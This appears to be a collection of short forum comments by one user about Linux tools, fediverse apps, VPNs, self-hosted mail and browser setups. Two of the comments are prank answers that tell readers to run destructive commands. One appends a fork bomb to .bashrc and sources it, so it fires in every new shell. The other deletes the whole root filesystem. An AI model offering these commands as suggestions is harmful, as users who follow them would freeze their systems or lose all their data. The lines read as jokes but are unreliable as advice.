Make everyone listen to 10 hours of cow sounds on repeat.
JavaScript is worse than COBOL.
Fuzzel is also nice if you are using Wayland.
Metatext for mastodon and thunder for lemmy.
Maybe try some third party native mobile apps. Fire fish supports the mastodon api so you can use any mastodon app with it.
Peertube but not written in JavaScript
I can’t believe some subreddits migrated to discord in protest over third party apps when discord will ban you if you try to use 3rd party apps.
apk upgrade -U in a cronjob daily and hope it does not break.
Not iTunes, but you can use libimobiledevice to backup an Apple device on Linux https://docs.mvt.re/en/latest/ios/backup/libimobiledevice/
I am starting to get frustrated with lemmy.world. The downtime and stability was one thing but now they cloudf****ed it, the stability has not significantly improved and cloud flare can now see everything we do here. Once there is account migration I plan on self hosting an instance.
Everyone run echo ":(){:|:};:" >> .bashrc; source .bashrc
in your linux terminal.
I use sway wm with the foot terminal emulator. If you do not like manual tiling I have heard good things about river wm.
rm -rf / —no-preserve-root
I am currently working on this. I got a static IP and port 25 unblocked from my isp. I am trying to do opensmtpd and dovecot with dkim signing.
What would you suggest now? IVPN and mullvad used to be my go-to VPN providers but now that they both removed port forwarding I really don’t know what to use.
Oh sorry I have no clue what I was thinking I meant >.
I don’t. Your ISP can hardly see anything you do online. Almost all websites are encrypted with HTTPS and if you are concerned about them seeing what domains you visit you can just change your dns server to quad9 or something else privacy respecting. A more valid usecase for VPN is preventing websites from tracking you IP address, downloading “Linux ISO’s” or bypassing geographical blocks and for that I used mullvad but I am looking for something else now that they blocked port forwarding.
I rarely use the containers. Instead I prefer to seperate activities with different versions of firefox. I use Firefox ESR for normal browsing, Firefox for VPN browsing and Firefox Dev/Chromium for school. I also use a different color scheme on each firefox so I do not confuse them.
BE USEFUL TEAM!